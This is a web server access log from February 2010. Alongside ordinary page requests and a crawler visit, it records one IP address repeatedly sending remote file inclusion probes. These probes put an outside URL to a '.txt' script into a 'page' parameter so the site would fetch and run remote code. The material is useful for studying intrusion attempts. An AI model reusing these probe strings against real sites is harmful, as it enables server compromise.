89.248.172.58 - - [02/Feb/2010:11:45:21 -0500] "GET /pages.html HTTP/1.1" 200 4692 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:21 -0500] "GET /illustrator.html HTTP/1.1" 200 6612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:21 -0500] "GET /flash.html HTTP/1.1" 200 4756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:21 -0500] "GET /photoshop.html HTTP/1.1" 200 7709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.248.172.58 - - [02/Feb/2010:11:45:22 -0500] "GET /print.html HTTP/1.1" 200 4324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.143.98.5 - - [02/Feb/2010:15:42:29 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:15:42:30 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:16:08:48 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:16:08:49 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
67.218.116.130 - - [02/Feb/2010:16:24:01 -0500] "GET /robots.txt HTTP/1.0" 404 269 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
123.143.98.5 - - [02/Feb/2010:16:49:28 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:16:49:29 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:17:18:48 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:17:18:49 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:18:14:56 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:18:14:56 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:19:08:49 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:19:08:50 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:19:50:28 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:19:50:28 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:20:37:29 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:20:37:30 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:21:18:25 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:21:18:28 -0500] "GET /photoshop.html/?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [02/Feb/2010:21:52:57 -0500] "GET /?page=http://www.tripezimoveis.com/phplive/1.txt??? HTTP/1.1" 200 1984 "-" "Mozilla/5.0"
